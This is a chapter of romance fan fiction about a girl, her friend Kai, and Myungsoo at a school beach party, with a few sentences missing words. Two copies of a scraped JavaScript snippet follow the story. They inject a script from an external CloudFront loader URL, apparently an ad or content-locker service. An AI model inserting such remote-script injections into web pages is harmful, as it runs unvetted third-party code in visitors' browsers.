Chapter 29

The Presidential Son

 

Narrator’s POV

“Haerin-ah? Wake up!” A deep voice boomed. Haerin hid under her sheets. Chanyeol chuckled.

“Kai’s downstairs, he’s picking you up.”

Haerin frowned as she sat up. Her brother sat beside her.

“W—why?”

“Some event you have to attend.” He shrugged. Haerin pouted and leaned on his shoulder.

“Cant you not tell him I’m not around?”

Chanyeol chuckled.

“So…..you and that kid from last night?”

“Mwo?”

“The guy who brought you home.”

“Oh, Myungsoo. He’s a good friend of mine.”

Chanyeol smirked.

“Maybe putting down your dating ban isn’t so bad.”

“You’re putting it down? Why? Did oppa eat something wrong?” Haerin chuckled as she stood up.

“Ani, because finally I saw someone worthy of you.”

“Who?”

“Dense littler sister, anyway, I’m glad that Kim Myungsoo found you last night. Come down for breakfast, Kai’s waiting.”

 

Your POV

 

“Good morning, honey.” Kai grinned as I sat down to eat breakfast. My mother grinned.

“You still call Kai that name, Haerin? What was it again….Jonginie?” Mother smiled.

“No, he’s too………experienced for that name already, eomma.” I gave Kai a look. Kai grinned and sipped his coffee.

“Ah, right. Where are we going?” I asked.

“You forgot about the beach party for the div?”

“Oh! Yeah, we’ll leave after breakfast.”

 

As soon as we got in the car, Kai lost his smile and glared at me. I sighed as I tossed my bag at the back.

“You! Next time you do that again, I will lock you in the house!”

“Kai, I was~”

“Do you know how worried we were? Sehun wanted to search for that twerp, and we both know about his temper!”

“And, you are not allowed to speak to that kid again, got it Park Haerin?”

“Fine.”

“Do that again. I’ll ask Chanyeol hyung to assign some bodyguards.”

I nodded and took out my phone.

“Were you the one who told Myungsoo?” I asked.

“Yes, I did. I was hoping he could find you, and yet he did. I like him, you two should date.” He said. I hit his arm.

“Just drive.”

 

Narrator’s POV

 

Myungsoo sat beside his friends and put on his earphones. They were already at the beach, some of the students were already playing games and running around.

“Is Haerin coming?” Sunggyu asked.

“I think she is.” Sungjong nodded. Myungsoo closed his eyes and tired to recall what happened last night. He hoped that things hadn’t gone awkward between them.

“Oh, Sehun’s here.” Sungyeol nodded at him. Sehun gave him a quick nod and walked over to the lunch table. Dongwoo and Hoya stood up to get some drinks. Then a black sports car arrived. Everyone turned in curiousity.

“Who is it?” Sunggyu asked. Sungyeol found the black Audi very familiar. Then Kai stepped down from the car, Haerin came from the other door.

Girls gasped, Kai didn’t let any of his girlfriends ride in his car. Ever.

“What is she doing?”

“Who’s she?!”

“She’s the !”

“Wasn’t she with Sehun last week? What is she?!”

Myungsoo sat up and saw the two. Kai grinned as he gave her bag to her.

“Thoughtless.” He muttered.

 

“Why did you have to pick me up?!”

“Why did you get in the car then?” Kai grinned. Haerin wanted to throw him to the water.

“I hate you, Kim Jongin.”

“Wo ai ni, babe.(I love you, babe.)”

“Ya!”

Kai ran away from her.

Haerin blew bangs up then three girls dressed in bikinis appeared before her.

“So you’re the reason Kai oppa’s been really busy.”

“I thought you were after Sehun. He even rejected me.”

Haerin closed her eyes briefly.

“We’re just friends~”

“That doesn’t work, you , even the sunbaes after you. What is so special about you anyway? Kai’s toy?”

“If I’m not mistaken, weren’t you his toy last week?” Myungsoo appeared behind Haerin. Haerin looked up at him.

“L oppa, she’s playing with you too, even Kai and Sehun~”

“Playing? How about you? And, she’s the ? Look at the way you’re dressed.”

The girl covered her body consciously. L smirked at her friends.

“Please, cover up, don’t disgrace the entire female population.” He said before dragging Haerin with him.

 

Myungsoo’s POV

 

Haerin sat beside me on the sand.

“Why did you ride with Kai today?” I asked.

“I forgot.” She smiled and looked down.

“They’re going to pester you.” I said. She just shrugged.

“Kai is my friend, I have to accept it.” She nodded. I looked at her. She still looked beautiful in her shorts and white t-shirt.

She looked behind us where some girls were playing volleyball.

“But…what did Seokjun tell you?” I asked. She grinned as she leaned on her knees.

“He asked me to be his girlfriend.”

“MWO?!”

“He did.” She blinked at me.

“Are you….” I felt something inside me drop.

“Aniya, I rejected him nicely.” She nodded and bit her lip.

“Myungsoo?”

“Hm?”

“Thanks.”

“For?”

“Caring.” She smiled.

 

Narrator’s POV

 

Sekyung gripped on the volleyball hardly as she saw Haerin talk intimately with Myungsoo. A small smirked formed on her face as she looked at the ball. She aimed it towards Haerin.

But, Myungsoo felt something odd; he turned around briefly and saw Sekyung throwing the ball. He pushed Haerin to the sand and the ball hit his back instead. He winced a little and sat up.

“Myungsoo, what~” Haerin saw the ball roll away from them. Myungsoo’s eyes changed.

“Stay here.” He said darkly. He stood up and dusted off his clothes.

“You! What is your problem?” He asked in a deep tone. Haerin stood up and looked at him approached Sekyung.

“Oppa, I….didnt mean to~”

He glared at Sekyung.

“Girls like you aren’t even worthy of attention.” He hissed. Hoya came in pushed him gently.

“Ya, relax. Sekyung’s a girl. Relax.”

“She is?” He arched one brow. Hoya looked at Sekyung and asked her to leave with his eyes. Myungsoo sighed and backed away.

“Oh, are you okay, Haerinah?” Hoya asked. Myungsoo spun around and found her looking at him.

“You’re scary.” She muttered. Hoya grinned. Myungsoo shook his head at her and poked her cheek.

“Let’s go get something to eat.”

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};